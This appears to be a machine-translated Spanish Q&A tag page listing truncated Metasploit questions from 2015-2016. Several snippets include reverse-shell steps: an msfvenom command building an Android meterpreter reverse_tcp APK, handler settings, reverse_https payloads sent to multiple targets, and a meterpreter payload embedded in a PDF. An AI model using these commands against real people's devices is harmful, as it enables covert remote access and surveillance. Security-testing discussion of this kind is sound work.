Preguntas con etiqueta 'metasploit'

preguntas con etiqueta
0
respuestas

¿Metasploit de cargas con VPN o proxies?

He comprado VPN con torguard y les pedí que reenvíen los puertos. Ejecuto una prueba en la IP de VPN y en los puertos especificados, y dice que los puertos están cerrados, pero dicen lo contrario en la interfaz. De todos modos creo una carga con...
hecha 07.09.2016 - 09:50
0
respuestas

Metasploit para conectarse a un objetivo detrás de NAT

Durante un pentest y experimenté un problema extraño al conectarme a la máquina de destino que está detrás de una red NAT, el escenario es básicamente, tienen una ip pública: 1.1.1.1 y hay varias máquinas dentro de la red con IP 172.16.2.0...
hecha 14.09.2016 - 13:29
1
respuesta

conexiones de Meterpreter

Si configuro un meterpreter reverse_https de carga útil y lo envío a múltiples objetivos y ejecutan la carga útil sin que mi controlador se ejecute, ¿cuándo configuro el controlador se conectarán o tengo que hacer que el controlador se ejecute s...
hecha 25.09.2016 - 18:02
0
respuestas

Adjuntar medidor de sesión huérfano / sin etapas

Tengo problemas con meterpreter reverse_https. En mi compromiso, vi este mensaje en la consola; "Adjuntar medidor de sesión huérfano / sin etapas" Pero después de que pierdo la conexión, la víctima se conecta una y otra vez y pierdo la conexión...
hecha 27.05.2016 - 20:49
0
respuestas

Android no está conectado a kali linux con meterpreter en metasploit

Sigo corriendo en un error. Creo una apk: msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R > test.apk En la consola, configuro el controlador múltiple /: set PAYLOAD android/meterpreter/reverse_tcp set LHOST...
hecha 09.05.2016 - 18:45
0
respuestas

web view addjavascriptinterface exploit

He estado golpeando mi cabeza alrededor de esto durante casi 56 horas (+/- algunas que saqué para tener un par de siestas y RedBulls) y no he podido llegar a ninguna parte con eso hasta ahora. Estoy tratando de entender la interfaz addjavascr...
hecha 23.06.2016 - 19:53
0
respuestas

metasploit comando de búsqueda para buscar una y otra palabra

¿Hay una manera de usar la consola metasploit para buscar 2 palabras exclusivamente? Por ejemplo: search X and Y // No sé si la sintaxis es la siguiente, por supuesto De una manera que solo devolverá exploits que tengan X...
hecha 27.03.2016 - 04:20
1
respuesta

Comandos de Stdapi que no se muestran en la sesión de meterpreter

Creé una carga útil de Android con IP pública ( android/meterpreter/reverse_https ). Los comandos stdapi ( ls , cd , webcam_snap , etc.) se muestran cuando la víctima está en la misma red. Pero cuando intento conectarm...
hecha 15.08.2016 - 18:25
0
respuestas

Base de datos de tráfico malintencionado cifrado

Estaba trabajando en un pequeño proyecto de investigación para identificar correctamente el patrón de tráfico cifrado generado por varias herramientas / aplicaciones, por ejemplo, metasploit (o aumentar la tasa de éxito). He ejecutado algunos ex...
hecha 09.03.2016 - 20:27
0
respuestas

El archivo PDF incrustado que genera un error en la máquina de destino cuando se ejecuta

Estos son los pasos que realicé para generar un PDF incrustado con exe. Máquina de ataque (Windows 7): msf > use windows/meterpreter/reverse_tcp msf payload(reverse_tcp) > set LHOST 192.168.0.102 msf payload(reverse_tcp) > genera...
hecha 24.10.2015 - 18:58